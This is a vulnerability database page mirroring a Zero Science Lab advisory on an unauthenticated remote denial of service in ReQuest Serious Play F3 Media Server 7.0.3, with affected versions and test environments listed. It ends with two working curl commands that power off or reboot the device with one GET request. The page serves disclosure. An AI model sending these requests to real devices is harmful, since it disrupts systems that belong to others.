Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service

🗓️ 18 Oct 2020 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 178 Views

ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service. Unauthenticated attacker can shutdown or reboot device with one HTTP GET request.

Related
Code
ReporterTitlePublishedViews
Family
CNNVD		ReQuest Serious Play Pro 安全漏洞
14 Nov 202500:00
cnnvd
CVE		CVE-2021-4465
14 Nov 202522:51
cve
Cvelist		CVE-2021-4465 ReQuest Serious Play F3 Media Server <= 7.0.3 Remote DoS
14 Nov 202522:51
cvelist
EUVD		EUVD-2021-34720
14 Nov 202522:51
euvd
NVD		CVE-2021-4465
14 Nov 202523:15
nvd
Positive Technologies		PT-2025-47016
14 Nov 202500:00
ptsecurity
RedhatCVE		CVE-2021-4465
17 Nov 202509:07
redhatcve
Vulnrichment		CVE-2021-4465 ReQuest Serious Play F3 Media Server <= 7.0.3 Remote DoS
14 Nov 202522:51
vulnrichment
<html><body><p>ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
                  7.0.2.4954
                  6.5.2.4954
                  6.4.2.4681
                  6.3.2.4203
                  2.0.1.823

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The device can be shutdown or rebooted by an unauthenticated attacker
when issuing one HTTP GET request.

Tested on: ReQuest Serious Play® OS v7.0.1
           ReQuest Serious Play® OS v6.0.0
           Debian GNU/Linux 5.0
           Linux 3.2.0-4-686-pae
           Linux 2.6.36-request+lenny.5
           Apache/2.2.22
           Apache/2.2.9
           PHP/5.4.45
           PHP/5.2.6-1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2020-5601
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php


01.08.2020

--


$ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
$ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Oct 2020 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 48.7
EPSS0.00619
SSVC
request serious playf3 media serverdenial of serviceunauthenticated attackerhttp get requestvulnerabilityvendorzero science lab
178